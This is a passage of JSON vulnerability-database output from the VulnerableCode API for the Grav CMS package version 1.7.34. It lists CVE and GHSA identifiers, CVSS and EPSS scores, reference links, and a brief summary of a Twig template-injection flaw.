ty":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34253","GHSA-j3v8-v77f-fvgm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ya18-2867-f7ar"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52565?format=json","vulnerability_id":"VCID-hrz6-czbk-wbfv","summary":"Code injection in grav\nGrav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2073","reference_id":"","reference_type":"","scores":[{"value":"0.00213","scoring_system":"epss","scoring_elements":"0.43831","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2073"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2073","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2073"},{"reference_url":"https://github.com/advisories/GHSA-cxgw-r5jg-7xwq","reference_id":"GHSA-cxgw-r5jg-7xwq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxgw-r5jg-7xwq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/89049?format=json","purl":"pkg:composer/getgrav/grav@1.7.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-ppnh-1zmd-t3c5"},{"vulnerability":"VCID-q9c3-abt1-2kdf"},{"vulnerability":"VCID-rs42-h8k4-zydz"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"},{"vulnerability":"VCID-ya18-2867-f7ar"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.34"}],"aliases":["CVE-2022-2073","GHSA-cxgw-r5jg-7xwq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hrz6-czbk-wbfv"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.34"}